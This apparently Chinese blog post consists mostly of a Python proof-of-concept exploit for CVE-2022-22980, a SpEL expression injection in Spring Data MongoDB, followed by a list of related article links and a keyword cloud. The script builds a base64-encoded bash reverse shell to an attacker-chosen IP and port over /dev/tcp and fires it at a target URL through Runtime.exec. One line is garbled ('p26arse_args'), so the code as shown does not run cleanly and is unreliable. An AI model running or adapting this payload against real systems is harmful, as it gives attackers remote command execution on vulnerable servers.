CVE-2022-22980

#CVE-2022-22980 Spring Data MongoDB SpEL表达式注入

import requests
import urllib
import base64
import argparse

def poc(url,ip,prot):
    urll=f'{url}/?name='
    shell=f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    shell=shell.encode('utf-8')
    shell=base64.b64encode(shell)
    shell=shell.decode('utf-8')
    payload="T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('bash -c {echo,"+shell+"}|{base64,-d}|{bash,-i}')"
    print(payload)
    data = payload.encode('utf-8')
    payload = urllib.parse.quote(data)
    requests.get(url=urll+payload,verify=False)


def main():
    parser=argparse.ArgumentParser(" python CVE-2022-22980.py -u http:192.168.56.200 -i 192.168.56.200 -p 1234")
    parser.add_argument('-u','--url',dest='url',help='输入漏洞url')
    parser.add_argument('-i','--ip',dest='ip',help='输入ip')
    parser.add_argument('-p','--prot',dest='prot',help='输入反弹端口')
    args=parser.p26arse_args()

    if args.url:
        poc(args.url,args.ip,args.prot)
    else:
        print('-h 帮助')


if __name__ == '__main__':
    main()

本栏目推荐文章
• AtCoder World Tour 2022 B The Greatest Two
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 多态和虚函数 [补档-2022-10-23]
• 深拷贝和浅拷贝的问题 [补档-2022-10-22]
• P8368 [LNOI2022] 串
• origin2022导出图有水印
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• CVE-2023-34050 Spring AMQP Deserialization Vulnerability
• CVE-2020-11800

22980 2022 CVE22980 2022 cve 28060 2022 cve 29464 2022 cve 32991 2022 cve amp cve 2022表达式 28512 2022 cve 镜像2022 0788 cve 22965 2022 cve 24263 2022 cve 24663 2022 cve